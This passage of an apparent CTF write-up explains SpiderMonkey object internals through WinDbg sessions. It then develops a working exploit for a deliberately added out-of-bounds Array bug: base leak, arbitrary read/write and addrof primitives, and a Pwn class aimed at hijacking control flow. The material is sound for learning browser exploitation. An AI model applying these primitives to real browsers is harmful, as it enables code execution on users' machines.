0:000> ?? (char*)((JSString*)0x000001fc`e63a7e20)->d.inlineStorageLatin1
char * 0x000001fc`e63a7e28
 "blah"

Good. As we mentioned above, shape objects are linked together. If we dump its parent, we expect to find the shape describing our second property, foo:

0:000> ?? ((js::shape*)0x000001fc`e63ae880)->parent.value
class js::Shape * 0x000001fc`e63ae858
   +0x000 base_            : js::GCPtr<js::BaseShape *>
   +0x008 propid_          : js::PreBarriered<jsid>
   +0x010 immutableFlags   : 0x2000000
   +0x014 attrs            : 0x1 ''
   +0x015 mutableFlags     : 0x2 ''
   +0x018 parent           : js::GCPtr<js::Shape *>
   +0x020 kids             : js::KidsPointer
   +0x020 listp            : 0x000001fc`e63ae880 js::GCPtr<js::Shape *>

0:000> ?? ((js::shape*)0x000001fc`e63ae880)->parent.value->propid_.value
struct jsid
   +0x000 asBits           : 0x000001fc`e633d700

0:000> ?? (char*)((JSString*)0x000001fc`e633d700)->d.inlineStorageLatin1
char * 0x000001fc`e633d708
 "foo"

Press g to continue the execution and check if the second object shares the same shape hierarchy (0x000001fce63ae880):

0:000> g
Breakpoint 0 hit
Time Travel Position: D484:D
js!js::math_atan2:
00007ff7`76c9e140 56              push    rsi

0:000> ?? vp[2].asBits_
unsigned int64 0xfffe01fc`e637e1f0

0:000> dt js::NativeObject 1fc`e637e1f0 shapeOrExpando_
   +0x008 shapeOrExpando_ : 0x000001fc`e63ae880 Void

As expected B indeed shares it even though A and B store different property values. Care to guess what is going to happen when we add another property to C now? To find out, press g one last time:

0:000> g
Breakpoint 0 hit
Time Travel Position: D493:D
js!js::math_atan2:
00007ff7`76c9e140 56              push    rsi

0:000> ?? vp[2].asBits_
union JS::Value
   +0x000 asBits_          : 0xfffe01e7`c247e1c0

0:000> dt js::NativeObject 1fc`e637e1f0 shapeOrExpando_
   +0x008 shapeOrExpando_ : 0x000001fc`e63b10d8 Void

0:000> ?? ((js::shape*)0x000001fc`e63b10d8)
class js::Shape * 0x000001fc`e63b10d8
   +0x000 base_            : js::GCPtr<js::BaseShape *>
   +0x008 propid_          : js::PreBarriered<jsid>
   +0x010 immutableFlags   : 0x2000002
   +0x014 attrs            : 0x1 ''
   +0x015 mutableFlags     : 0 ''
   +0x018 parent           : js::GCPtr<js::Shape *>
   +0x020 kids             : js::KidsPointer
   +0x020 listp            : (null) 

0:000> ?? ((js::shape*)0x000001fc`e63b10d8)->propid_.value
struct jsid
   +0x000 asBits           : 0x000001fc`e63a7e60

0:000> ?? (char*)((JSString*)0x000001fc`e63a7e60)->d.inlineStorageLatin1
char * 0x000001fc`e63a7e68
 "another"

0:000> ?? ((js::shape*)0x000001fc`e63b10d8)->parent.value
class js::Shape * 0x000001fc`e63ae880

A new js::Shape gets allocated (0x000001fce63b10d8) and its parent is the previous chain of shapes (0x000001fce63ae880). A bit like prepending a node to a linked-list.

shapes

Slots

In the previous section, we talked a lot about how property names are stored in memory. Now where are property values?

To answer this question, we throw the previous TTD trace we acquired into our debugger and go back to the first call to Math.atan2:

Breakpoint 0 hit
Time Travel Position: D454:D
js!js::math_atan2:
00007ff7`76c9e140 56              push    rsi

0:000> ?? vp[2].asBits_
unsigned int64 0xfffe01fc`e637e1c0  

Because we went through the process of dumping the js::Shape objects describing the foo and the blah properties already, we know that their property values are respectively stored in slot zero and slot one. To look at those, we just dump the memory right after the js::NativeObject:

0:000> ?? vp[2].asBits_
unsigned int64 0xfffe01fc`e637e1c0
0:000> dt js::NativeObject 1fce637e1c0
   +0x000 group_           : js::GCPtr<js::ObjectGroup *>
   +0x008 shapeOrExpando_  : 0x000001fc`e63ae880 Void
   +0x010 slots_           : (null) 
   +0x018 elements_        : 0x00007ff7`7707dac0 js::HeapSlot

0:000> dqs 1fc`e637e1c0
000001fc`e637e1c0  000001fc`e637a520
000001fc`e637e1c8  000001fc`e63ae880
000001fc`e637e1d0  00000000`00000000
000001fc`e637e1d8  00007ff7`7707dac0 js!emptyElementsHeader+0x10
000001fc`e637e1e0  fff88000`00000539 <- foo
000001fc`e637e1e8  fffb01fc`e63a7e40 <- blah

Naturally, the second property is another js::Value pointing to a JSString and we can dump it as well:

0:000> ?? (char*)((JSString*)0x1fce63a7e40)->d.inlineStorageLatin1
char * 0x000001fc`e63a7e48
 "doar-e"

Here is a diagram describing the hierarchy of objects to clear any potential confusion:

properties.svg

This is really as much internals as I wanted to cover, as it should be enough to understand what follows. You should also be able to inspect most JavaScript objects with this background. The only sort of oddball I have encountered is JavaScript Arrays, which store the length property in a js::ObjectElements object for example; but that is about it.

0:000> dt js::ObjectElements
   +0x000 flags            : Uint4B
   +0x004 initializedLength : Uint4B
   +0x008 capacity         : Uint4B
   +0x00c length           : Uint4B

Exploits

Now that we all are SpiderMonkey experts, let's have a look at the actual challenge. Note that we clearly did not need all of the above context just to write a simple exploit. The thing is, just writing an exploit was never my goal.

The vulnerability

After taking a closer look at the blaze.patch diff, it becomes pretty clear that the author added a method called blaze to Array objects. This new method changes the internal length field to 420, because it was Blaze CTF after all :). This allows us to read and write out-of-bounds off the end of the backing buffer.

js> blz = []
[]

js> blz.length
0

js> blz.blaze() == undefined
false

js> blz.length
420

One little quirk to keep in mind when using the debug build of js.exe is that you need to ensure the blaze'd object is never displayed by the interpreter. If it is, the toString() function of the array iterates through every item and invokes its toString(). This basically blows up once you start reading out-of-bounds, and you will most likely run into the below crash:

js> blz.blaze()
Assertion failure: (ptrBits & 0x7) == 0, at c:\Users\over\mozilla-central\js\src\build-release.x64\dist\include\js/Value.h:809

(1d7c.2b3c): Break instruction exception - code 80000003 (!!! second chance !!!)
*** WARNING: Unable to verify checksum for c:\work\codes\blazefox\js-asserts\js.exe
js!JS::Value::toGCThing+0x75 [inlined in js!JS::MutableHandle<JS::Value>::set+0x97]:
00007ff6`ac86d7d7 cc              int     3

An easy work-around for this annoyance is to either provide a file directly to the JavaScript shell or to use an expression that does not return the resulting array, like blz.blaze() == undefined. Note that, naturally, you will not encounter the above assertion in the release build.

basic.js

As introduced above, our goal with this exploit is to pop calc. We don't care about how unreliable or crappy the exploit is: we just want to get native code execution inside the JavaScript shell. For this exploit, I targeted a debug build of the shell where asserts are enabled. I encourage you to follow along, and for that I have shared the binaries (along with symbol information) here: js-asserts.

With an out-of-bounds like this one what we want is to have two adjacent arrays and use the first one to corrupt the second one. With this set-up, we can convert a limited relative memory read / write access primitive to an arbitrary read / write primitive.

Now, we have to keep in mind that Arrays store js::Values and not raw values. If you were to write the value 0x1337 out-of-bounds from JavaScript, you would actually write the value 0xfff8800000001337 in memory. It felt a bit weird at the beginning but, as usual, you get used to this type of thing pretty quickly :-).
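
If you want to convince yourself of that encoding, here is a small helper you can paste in the shell (Int32ToJSValue is a made-up name; it returns the two 32-bit halves as hex strings since JavaScript numbers cannot represent 64-bit integers exactly):

function Int32ToJSValue(V) {
    // The 17-bit JSVAL_TAG_INT32 (0x1fff1) sits at the top of the high dword:
    // 0x1fff1 << 15 == 0xfff88000.
    const Hi = (0x1fff1 << 15) >>> 0;
    return [Hi.toString(16), (V >>> 0).toString(16)];
}

js> Int32ToJSValue(0x1337)
["fff88000", "1337"]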

Anyway moving on: time to have a closer look at Arrays. For that, I highly recommend grabbing an execution trace of a simple JavaScript file creating arrays with TTD. Once traced, you can load it in the debugger in order to figure out how Arrays are allocated and where.

Note that to inspect JavaScript objects from the debugger I use a JavaScript extension I wrote called sm.js that you can find here.

0:000> bp js!js::math_atan2

0:000> g
Breakpoint 0 hit
Time Travel Position: D5DC:D
js!js::math_atan2:
00007ff7`4704e140 56              push    rsi

0:000> !smdump_jsvalue vp[2].asBits_
25849101b00: js!js::ArrayObject:   Length: 4
25849101b00: js!js::ArrayObject: Capacity: 6
25849101b00: js!js::ArrayObject:  Content: [0x1, 0x2, 0x3, 0x4]
@$smdump_jsvalue(vp[2].asBits_)

0:000>  dx -g @$cursession.TTD.Calls("js!js::allocate<JSObject,js::NoGC>").Where(p => p.ReturnValue == 0x25849101b00)
=====================================================================================================================================================================================================================
=           = (+) EventType = (+) ThreadId = (+) UniqueThreadId = (+) TimeStart = (+) TimeEnd = (+) Function                          = (+) FunctionAddress = (+) ReturnAddress = (+) ReturnValue  = (+) Parameters =
=====================================================================================================================================================================================================================
= [0x14]    - Call          - 0x32f8       - 0x2                - D58F:723      - D58F:77C    - js!js::Allocate<JSObject,js::NoGC>    - 0x7ff746f841b0      - 0x7ff746b4b702    - 0x25849101b00    - {...}          =
=====================================================================================================================================================================================================================

0:000> !tt D58F:723 
Setting position: D58F:723
Time Travel Position: D58F:723
js!js::Allocate<JSObject,js::NoGC>:
00007ff7`46f841b0 4883ec28        sub     rsp,28h

0:000> kc
 # Call Site
00 js!js::Allocate<JSObject,js::NoGC>
01 js!js::NewObjectCache::newObjectFromHit
02 js!NewArrayTryUseGroup<4294967295>
03 js!js::NewCopiedArrayForCallingAllocationSite
04 js!ArrayConstructorImpl
05 js!js::ArrayConstructor
06 js!InternalConstruct
07 js!Interpret
08 js!js::RunScript
09 js!js::ExecuteKernel
0a js!js::Execute
0b js!JS_ExecuteScript
0c js!Process
0d js!main
0e js!__scrt_common_main_seh
0f KERNEL32!BaseThreadInitThunk
10 ntdll!RtlUserThreadStart

0:000> dv
           kind = OBJECT8_BACKGROUND (0n9)
  nDynamicSlots = 0
           heap = DefaultHeap (0n0)

Cool. According to the above, new Array(1, 2, 3, 4) is allocated from the Nursery heap (or DefaultHeap) and is an OBJECT8_BACKGROUND. This kind of object is 0x60 bytes long, as you can see below:

0:000> x js!js::gc::Arena::ThingSizes
00007ff7`474415b0 js!js::gc::Arena::ThingSizes = <no type information>

0:000> dds 00007ff7`474415b0 + 9*4 l1
00007ff7`474415d4  00000060

The Nursery heap is 16MB at most (by default; it can be tweaked with the --nursery-size option). One nice thing for us about this allocator is that there is no randomization whatsoever. If we allocate two arrays, there is a high chance that they end up adjacent in memory. The other awesome thing is that TypedArrays are allocated there too.

As a first experiment we can try to have an Array and a TypedArray adjacent in memory and confirm things in a debugger. The script I used is pretty dumb as you can see:

const Smalls = new Array(1, 2, 3, 4);
const U8A = new Uint8Array(8);

Let's have a look at it from the debugger now:

(2ab8.22d4): Break instruction exception - code 80000003 (first chance)
ntdll!DbgBreakPoint:
00007fff`b8c33050 cc              int     3
0:005> bp js!js::math_atan2

0:005> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff7`4704e140 56              push    rsi

0:000> ?? vp[2].asBits_
unsigned int64 0xfffe013e`bb2019e0

0:000> .scriptload c:\work\codes\blazefox\sm\sm.js
JavaScript script successfully loaded from 'c:\work\codes\blazefox\sm\sm.js'

0:000> !smdump_jsvalue vp[2].asBits_
13ebb2019e0: js!js::ArrayObject:   Length: 4
13ebb2019e0: js!js::ArrayObject: Capacity: 6
13ebb2019e0: js!js::ArrayObject:  Content: [0x1, 0x2, 0x3, 0x4]
@$smdump_jsvalue(vp[2].asBits_)

0:000> ? 0xfffe013e`bb2019e0 + 60
Evaluate expression: -561581014377920 = fffe013e`bb201a40

0:000> !smdump_jsvalue 0xfffe013ebb201a40
13ebb201a40: js!js::TypedArrayObject:       Type: Uint8Array
13ebb201a40: js!js::TypedArrayObject:     Length: 8
13ebb201a40: js!js::TypedArrayObject: ByteLength: 8
13ebb201a40: js!js::TypedArrayObject: ByteOffset: 0
13ebb201a40: js!js::TypedArrayObject:    Content: Uint8Array({Length:8, ...})
@$smdump_jsvalue(0xfffe013ebb201a40)

Cool, story checks out: the Array (which is 0x60 bytes) is adjacent to the TypedArray. It might be a good occasion for me to tell you that, between the time I compiled the debug build of the JavaScript shell and the time I compiled the release version, some core structures slightly changed; this means that if you use sm.js on the debug one it will not work :). Here is an example of such a change illustrated below:

0:008> dt js::Shape
   +0x000 base_            : js::GCPtr<js::BaseShape *>
   +0x008 propid_          : js::PreBarriered<jsid>
   +0x010 slotInfo         : Uint4B
   +0x014 attrs            : UChar
   +0x015 flags            : UChar
   +0x018 parent           : js::GCPtr<js::Shape *>
   +0x020 kids             : js::KidsPointer
   +0x020 listp            : Ptr64 js::GCPtr<js::Shape *>

VS

0:000> dt js::Shape
   +0x000 base_            : js::GCPtr<js::BaseShape *>
   +0x008 propid_          : js::PreBarriered<jsid>
   +0x010 immutableFlags   : Uint4B
   +0x014 attrs            : UChar
   +0x015 mutableFlags     : UChar
   +0x018 parent           : js::GCPtr<js::Shape *>
   +0x020 kids             : js::KidsPointer
   +0x020 listp            : Ptr64 js::GCPtr<js::Shape *>

As we want to corrupt the adjacent TypedArray, we should probably have a look at its layout. We are interested in corrupting such an object to be able to fully control memory: writing actual raw bytes instead of controlled js::Values will be pretty useful to us. For those who are not familiar with TypedArrays, they are JavaScript objects that allow you to access raw binary data like you would with C arrays. For example, Uint32Array gives you a mechanism for accessing raw uint32_t data, Uint8Array for uint8_t data, etc.

By looking at the source-code, we learn that TypedArrays are js::TypedArrayObject which subclasses js::ArrayBufferViewObject. What we want to know is basically in which slot the buffer size and the buffer pointer are stored (so that we can corrupt them):

class ArrayBufferViewObject : public NativeObject
{
  public:
    // Underlying (Shared)ArrayBufferObject.
    static constexpr size_t BUFFER_SLOT = 0;
    // Slot containing length of the view in number of typed elements.
    static constexpr size_t LENGTH_SLOT = 1;
    // Offset of view within underlying (Shared)ArrayBufferObject.
    static constexpr size_t BYTEOFFSET_SLOT = 2;
    static constexpr size_t DATA_SLOT = 3;
// [...]
};

class TypedArrayObject : public ArrayBufferViewObject

Great. This is what it looks like in the debugger:

0:000> ?? vp[2]
union JS::Value
   +0x000 asBits_          : 0xfffe0216`3cb019e0
   +0x000 asDouble_        : -1.#QNAN 
   +0x000 s_               : JS::Value::<unnamed-type-s_>

0:000> dt js::NativeObject 216`3cb019e0
   +0x000 group_           : js::GCPtr<js::ObjectGroup *>
   +0x008 shapeOrExpando_  : 0x00000216`3ccac948 Void
   +0x010 slots_           : (null) 
   +0x018 elements_        : 0x00007ff7`f7ecdac0 js::HeapSlot

0:000> dqs 216`3cb019e0
00000216`3cb019e0  00000216`3cc7ac70
00000216`3cb019e8  00000216`3ccac948
00000216`3cb019f0  00000000`00000000
00000216`3cb019f8  00007ff7`f7ecdac0 js!emptyElementsHeader+0x10
00000216`3cb01a00  fffa0000`00000000 <- BUFFER_SLOT
00000216`3cb01a08  fff88000`00000008 <- LENGTH_SLOT
00000216`3cb01a10  fff88000`00000000 <- BYTEOFFSET_SLOT
00000216`3cb01a18  00000216`3cb01a20 <- DATA_SLOT
00000216`3cb01a20  00000000`00000000 <- Inline data (8 bytes)

As you can see, the length is a js::Value and the pointer to the inline buffer of the array is a raw pointer. What is also convenient is that the elements_ field points into the .rdata section of the JavaScript engine binary (js.exe when using the JavaScript Shell, and xul.dll when using Firefox). We use it to leak the base address of the module.

With this in mind we can start to create exploitation primitives:

  1. We can leak the base address of js.exe by reading the elements_ field of the TypedArray,
  2. We can create absolute memory access primitives by corrupting the DATA_SLOT and then reading / writing through the TypedArray (can also corrupt the LENGTH_SLOT if needed).

Now, you might be wondering how we are going to be able to read a raw pointer through an Array that stores js::Values. What do you think happens if we read a user-mode pointer as a js::Value?

To answer this question, I think it is a good time to sit down and have a look at IEEE754 and the way doubles are encoded in js::Value, to hopefully find out if the above operation is safe or not. The largest js::Value recognized as a double is 0x1fff0 << 47 = 0xfff8000000000000 (0x1fff0 being the JSVAL_TAG_MAX_DOUBLE tag), and everything smaller is considered a double as well. Naively, you could think that you can encode pointers from 0x0000000000000000 to 0xfff8000000000000 as js::Value doubles. The way doubles are encoded according to IEEE754 is that you have 52 bits of fraction, 11 bits of exponent and 1 bit of sign. The standard also defines a bunch of special values such as NaN or Infinity. Let's walk through each of them one by one.

NaN is represented through several bit patterns that all follow the same rule: the exponent has all bits set to 1 and the fraction can be anything except all zero bits. This gives us the following NaN range: [0x7ff0000000000001, 0xffffffffffffffff]. See below for details:

  • 0x7ff0000000000001 is the smallest NaN with sign=0, exp='1'*11, frac='0'*51+'1':
    • 0b0111111111110000000000000000000000000000000000000000000000000001
  • 0xffffffffffffffff is the biggest NaN with sign=1, exp='1'*11, frac='1'*52:
    • 0b1111111111111111111111111111111111111111111111111111111111111111

There are two Infinity values, a positive and a negative one: 0x7ff0000000000000 and 0xfff0000000000000. See below for details:

  • 0x7ff0000000000000 is +Infinity with sign=0, exp='1'*11, frac='0'*52:
    • 0b0111111111110000000000000000000000000000000000000000000000000000
  • 0xfff0000000000000 is -Infinity with sign=1, exp='1'*11, frac='0'*52:
    • 0b1111111111110000000000000000000000000000000000000000000000000000

There are also two Zero values, a positive and a negative one, whose encodings are 0x0000000000000000 and 0x8000000000000000. See below for details:

  • 0x0000000000000000 is +0 with sign=0, exp='0'*11, frac='0'*52:
    • 0b0000000000000000000000000000000000000000000000000000000000000000
  • 0x8000000000000000 is -0 with sign=1, exp='0'*11, frac='0'*52:
    • 0b1000000000000000000000000000000000000000000000000000000000000000

Basically, NaN values are the annoying ones: if we leak a raw pointer through a js::Value, we are not able to tell if its value is 0x7ff0000000000001, 0xffffffffffffffff or anything in between. The rest of the special values are fine as there is a 1:1 match between the encoding and its meaning. In a 64-bit process on Windows, the user-mode part of the virtual address space is 128TB: from 0x0000000000000000 to 0x00007fffffffffff. Good news: there is no intersection between the NaN range and the possible values of a user-mode pointer, which means we can safely leak them via a js::Value :).

If you would like to play with the above a bit more, you can use the below functions in the JavaScript Shell:

function b2f(A) {
    if(A.length != 8) {
        throw 'Needs to be an 8 bytes long array';
    }

    const Bytes = new Uint8Array(A);
    const Doubles = new Float64Array(Bytes.buffer);
    return Doubles[0];
}

function f2b(A) {
    const Doubles = new Float64Array(1);
    Doubles[0] = A;
    return Array.from(new Uint8Array(Doubles.buffer));
}

And see things for yourselves:

// +Infinity
js> f2b(b2f([0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf0, 0x7f]))
[0, 0, 0, 0, 0, 0, 240, 127]

// -Infinity
js> f2b(b2f([0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf0, 0xff]))
[0, 0, 0, 0, 0, 0, 240, 255]

// NaN smallest
js> f2b(b2f([0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0xf0, 0x7f]))
[0, 0, 0, 0, 0, 0, 248, 127]

// NaN biggest
js> f2b(b2f([0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff]))
[0, 0, 0, 0, 0, 0, 248, 127]

Anyway, this means we can leak the emptyElementsHeader pointer as well as corrupt the DATA_SLOT buffer pointer with doubles. Because I did not realize how doubles were encoded in js::Value at first (duh), I actually had another Array adjacent to the TypedArray (one Array, one TypedArray and one Array) so that I could read the pointer via the TypedArray :(.

Last thing to mention before coding a bit: we use the Int64.js library written by saelo in order to represent 64-bit integers (which we cannot represent today with JavaScript native numbers) and to have utility functions to convert a double to an Int64 and vice-versa. This is not something we have to use, but it makes things feel more natural. At the time of writing, the BigInt (aka arbitrary-precision JavaScript integers) standard wasn't enabled by default in Firefox, but it should be pretty mainstream in every major browser quite soon. It will make all those shenanigans easier and you will not need any custom JavaScript module to exploit your browser anymore, quite the luxury :-).
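
If you have never used Int64.js, the round-trip at the heart of all our primitives looks like this (the pointer value is the js!emptyElementsHeader leak we end up reading in the next section, so the outputs are real):

js> load('..\\exploits\\int64.js')

js> new Int64('0x00007ff7f7ecdac0').asDouble()
6.951651517974e-310

js> Int64.fromDouble(6.951651517974e-310).toString(16)
"0x00007ff7f7ecdac0"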

Below is a summary diagram of the blaze'd Array and the TypedArray that we can corrupt via the first one:

basic.js

Building an arbitrary memory access primitive

As per the above illustration, the first Array is 0x60 bytes long (including the inline buffer, assuming we instantiate it with at most 6 entries). The inline backing buffer starts at +0x30 (6*8) and can hold 6 js::Values (another 0x30 bytes), and the target pointer to leak is at +0x18 (3*8) inside the TypedArray. This means that if we read the (6+3)th entry of the Array, index 9, we should get back the js!emptyElementsHeader pointer encoded as a double:

js> b = new Array(1,2,3,4,5,6)
[1, 2, 3, 4, 5, 6]

js> c = new Uint8Array(8)
({0:0, 1:0, 2:0, 3:0, 4:0, 5:0, 6:0, 7:0})

js> b[9]

js> b.blaze() == undefined
false

js> b[9]
6.951651517974e-310

js> load('..\\exploits\\utils.js')

js> load('..\\exploits\\int64.js')

js> Int64.fromDouble(6.951651517974e-310).toString(16)
"0x00007ff7f7ecdac0"

# break to the debugger

0:006> ln 0x00007ff7f7ecdac0
(00007ff7`f7ecdab0)   js!emptyElementsHeader+0x10 
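
From that leak, recovering js.exe's base boils down to a subtraction. A minimal sketch, assuming you grabbed the RVA of the leaked symbol from your own binary beforehand (the value below is a placeholder) and using the Sub helper from int64.js:

// Placeholder RVA: compute it once in the debugger with
// `? js!emptyElementsHeader+0x10 - js` for your exact js.exe.
const EmptyElementsRVA = new Int64('0x0000000001a3dac0');
const JSBase = Sub(Int64.fromDouble(b[9]), EmptyElementsRVA);
print('[+] js.exe is @ ' + JSBase.toString(16));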

For the read and write primitives, as mentioned earlier, we can corrupt the DATA_SLOT pointer of the TypedArray with the address we want to read from / write to encoded as a double. Corrupting the length is even easier as it is stored as a js::Value. The base pointer should be at index 13 (9+4) and the length at index 11 (9+2).

js> b.length
420

js> c.length
8

js> b[11]
8

js> b[11] = 1337
1337

js> c.length
1337

js> b[13] = new Int64('0xdeadbeefbaadc0de').asDouble()
-1.1885958399657559e+148

Reading a byte out of c should now trigger the below exception in the debugger:

js!js::TypedArrayObject::getElement+0x4a:
00007ff7`f796648a 8a0408          mov     al,byte ptr [rax+rcx] ds:deadbeef`baadc0de=??

0:000> kc
 # Call Site
00 js!js::TypedArrayObject::getElement
01 js!js::NativeGetPropertyNoGC
02 js!Interpret
03 js!js::RunScript
04 js!js::ExecuteKernel
05 js!js::Execute
06 js!JS_ExecuteScript
07 js!Process
08 js!main
09 js!__scrt_common_main_seh
0a KERNEL32!BaseThreadInitThunk
0b ntdll!RtlUserThreadStart

0:000> lsa .
  1844:     switch (type()) {
  1845:       case Scalar::Int8:
  1846:         return Int8Array::getIndexValue(this, index);
  1847:       case Scalar::Uint8:
> 1848:         return Uint8Array::getIndexValue(this, index);
  1849:       case Scalar::Int16:
  1850:         return Int16Array::getIndexValue(this, index);
  1851:       case Scalar::Uint16:
  1852:         return Uint16Array::getIndexValue(this, index);
  1853:       case Scalar::Int32:

Pewpew.

Building an object address leak primitive

Another primitive that has been incredibly useful is one that leaks the address of an arbitrary JavaScript object. It is useful both for debugging and for corrupting objects in memory. Again, this is fairly easy to implement once you have the above primitives. We could place a third Array (adjacent to the TypedArray), write the object whose address we want to leak into the first entry of that Array, and use the TypedArray to read relatively from its inline backing buffer to retrieve the js::Value encoding the object. From there, we could just strip off some bits and call it a day. The same works with a property of an adjacent object (which is what foxpwn, written by saelo, uses). It is basically a matter of being able to read relatively from the inline buffer to a location that eventually leads you to the js::Value encoding your object address.

Another solution, which does not require us to create another array, is to use the first Array to write out-of-bounds into the backing buffer of our TypedArray. Then, we can simply read the js::Value byte by byte out of the TypedArray's inline backing buffer and extract the object address. We should be able to write into the TypedArray buffer using index 14 (9+5). Don't forget to instantiate your TypedArray with enough storage to account for this or you will end up corrupting memory :-).

js> c = new Uint8Array(8)
({0:0, 1:0, 2:0, 3:0, 4:0, 5:0, 6:0, 7:0})

js> d = new Array(1337, 1338, 1339)
[1337, 1338, 1339]

js> b[14] = d
[1337, 1338, 1339]

js> c.slice(0, 8)
({0:32, 1:29, 2:32, 3:141, 4:108, 5:1, 6:254, 7:255})

js> Int64.fromJSValue(c.slice(0, 8)).toString(16)
"0x0000016c8d201d20"

And we can verify with the debugger that we indeed leaked the address of d:

0:005> !smdump_jsobject 0x16c8d201d20
16c8d201d20: js!js::ArrayObject:   Length: 3
16c8d201d20: js!js::ArrayObject: Capacity: 6
16c8d201d20: js!js::ArrayObject:  Content: [0x539, 0x53a, 0x53b]
@$smdump_jsvalue(0xfffe016c8d201d20)

0:005> ? 539
Evaluate expression: 1337 = 00000000`00000539

Sweet, we now have all the building blocks we require to write basic.js and pop some calc. At this point, I combined all the primitives we described in a Pwn class that abstracts away the corruption details:

class __Pwn {
    constructor() {
        this.SavedBase = Smalls[13];
    }

    __Access(Addr, LengthOrValues) {
        if(typeof Addr == 'string') {
            Addr = new Int64(Addr);
        }

        const IsRead = typeof LengthOrValues == 'number';
        let Length = LengthOrValues;
        if(!IsRead) {
            Length = LengthOrValues.length;
        }

        if(IsRead) {
            dbg('Read(' + Addr.toString(16) + ', ' + Length + ')');
        } else {
            dbg('Write(' + Addr.toString(16) + ', ' + Length + ')');
        }

        //
        // Fix U8A's byteLength.
        //

        Smalls[11] = Length;

        //
        // Verify that we properly corrupted the length of U8A.
        //

        if(U8A.byteLength != Length) {
            throw "Error: The Uint8Array's length doesn't check out";
        }

        //
        // Fix U8A's base address.
        //

        Smalls[13] = Addr.asDouble();

        if(IsRead) {
            return U8A.slice(0, Length);
        }

        U8A.set(LengthOrValues);
    }

    Read(Addr, Length) {
        return this.__Access(Addr, Length);
    }

    WritePtr(Addr, Value) {
        const Values = new Int64(Value);
        this.__Access(Addr, Values.bytes());
    }

    ReadPtr(Addr) {
        return new Int64(this.Read(Addr, 8));
    }

    AddrOf(Obj) {

        //
        // Fix U8A's byteLength and base.
        //

        Smalls[11] = 8;
        Smalls[13] = this.SavedBase;

        //
        // Smalls is contiguous with U8A. Go and write a jsvalue in its buffer,
        // and then read it out via U8A.
        //

        Smalls[14] = Obj;
        return Int64.fromJSValue(U8A.slice(0, 8));
    }
};

const Pwn = new __Pwn();
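
Before using it for real, here is the kind of quick sanity check you can run with the class (a sketch; the printed addresses will obviously differ from run to run):

// Leak the address of a fresh object...
const Obj = {doare : 1};
const ObjAddress = Pwn.AddrOf(Obj);
print('[+] Obj is @ ' + ObjAddress.toString(16));

// ...read its group_ pointer (the first quad-word of any JSObject)...
const Group = Pwn.ReadPtr(ObjAddress);
print('[+] Obj group_ is @ ' + Group.toString(16));

// ...and write it back in place, which should leave the object intact.
Pwn.WritePtr(ObjAddress, Group.toString(16));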

Hijacking control-flow

Now that we have built ourselves all the necessary tools, we need to find a way to hijack control-flow. In Firefox, this is not protected against by any type of CFI implementation, so it is just a matter of finding a writeable function pointer and a way to trigger its invocation from JavaScript. We will deal with the rest later :).

Based off what I have read over time, there have been several ways to achieve that depending on the context and your constraints:

  1. Overwriting a saved-return address (what people usually choose to do when software is protected with forward-edge CFI),
  2. Overwriting a virtual-table entry (plenty of those in a browser context),
  3. Overwriting a pointer to a JIT'd JavaScript function (good target in a JavaScript shell as the above does not really exist),
  4. Overwriting another type of function pointer (another good target in a JavaScript shell environment).

The last item is the one we will be focusing on today. Finding such a target was not really hard, as one was already described by Hanming Zhang from the 360 Vulcan team.

Every JavaScript object defines various methods and, as a result, those must be stored somewhere. Lucky for us, there are a bunch of SpiderMonkey structures that describe just that. One of the fields we did not mention earlier in a js::NativeObject is the group_ field. A js::ObjectGroup documents type information about a group of objects. Its clasp_ field links to another object that describes the class of the object group.

For example, the class for our c object is Uint8Array. It is precisely in this object that the name of the class and the various methods it defines can be found. If we follow the cOps field of the js::Class object, we end up on a bunch of function pointers that get invoked by the JavaScript engine at specific times: adding a property to an object, removing a property, etc.

Enough talking, let's have a look in the debugger what it actually looks like with a TypedArray object:

0:005> g
Breakpoint 0 hit
js!js::math_atan2:
00007ff7`f7aee140 56              push    rsi

0:000> ?? vp[2]
union JS::Value
   +0x000 asBits_          : 0xfffe016c`8d201cc0
   +0x000 asDouble_        : -1.#QNAN 
   +0x000 s_               : JS::Value::<unnamed-type-s_>

0:000> dt js::NativeObject 0x016c8d201cc0
   +0x000 group_           : js::GCPtr<js::ObjectGroup *>
   +0x008 shapeOrExpando_  : 0x0000016c`8daac970 Void
   +0x010 slots_           : (null) 
   +0x018 elements_        : 0x00007ff7`f7ecdac0 js::HeapSlot

0:000> dt js!js::GCPtr<js::ObjectGroup *> 0x16c8d201cc0
   +0x000 value            : 0x0000016c`8da7ad30 js::Ob

0:000> dt js!js::ObjectGroup 0x0000016c`8da7ad30
   +0x000 clasp_           : 0x00007ff7`f7edc510 js::Class
   +0x008 proto_           : js::GCPtr<js::TaggedProto>
   +0x010 realm_           : 0x0000016c`8d92a800 JS::Realm
   +0x018 flags_           : 1
   +0x020 addendum_        : (null) 
   +0x028 propertySet      : (null) 

0:000> dt js!js::Class 0x00007ff7`f7edc510 
   +0x000 name             : 0x00007ff7`f7f8e0e8  "Uint8Array"
   +0x008 flags            : 0x65200303
   +0x010 cOps             : 0x00007ff7`f7edc690 js::ClassOps
   +0x018 spec             : 0x00007ff7`f7edc730 js::ClassSpec
   +0x020 ext              : 0x00007ff7`f7edc930 js::ClassExtension
   +0x028 oOps             : (null) 

0:000> dt js!js::ClassOps 0x00007ff7`f7edc690
   +0x000 addProperty      : (null) 
   +0x008 delProperty      : (null) 
   +0x010 enumerate        : (null) 
   +0x018 newEnumerate     : (null) 
   +0x020 resolve          : (null) 
   +0x028 mayResolve       : (null) 
   +0x030 finalize         : 0x00007ff7`f7961000     void  js!js::TypedArrayObject::finalize+0
   +0x038 call             : (null) 
   +0x040 hasInstance      : (null) 
   +0x048 construct        : (null) 
   +0x050 trace            : 0x00007ff7`f780a330     void  js!js::ArrayBufferViewObject::trace+0

0:000> !address 0x00007ff7`f7edc690
Usage:                  Image
Base Address:           00007ff7`f7e9a000
End Address:            00007ff7`f7fd4000
Region Size:            00000000`0013a000 (   1.227 MB)
State:                  00001000          MEM_COMMIT
Protect:                00000002          PAGE_READONLY
Type:                   01000000          MEM_IMAGE

Naturally, those pointers are stored in a read-only section, which means we cannot overwrite them directly. But that is fine: we can keep stepping backward until we find a writeable pointer. Once we do, we can artificially recreate the chain of structures up to the cOps field ourselves, but with hijacked pointers. Based on the above, the "earliest" object we can corrupt is the js::ObjectGroup one, and more precisely its clasp_ field.

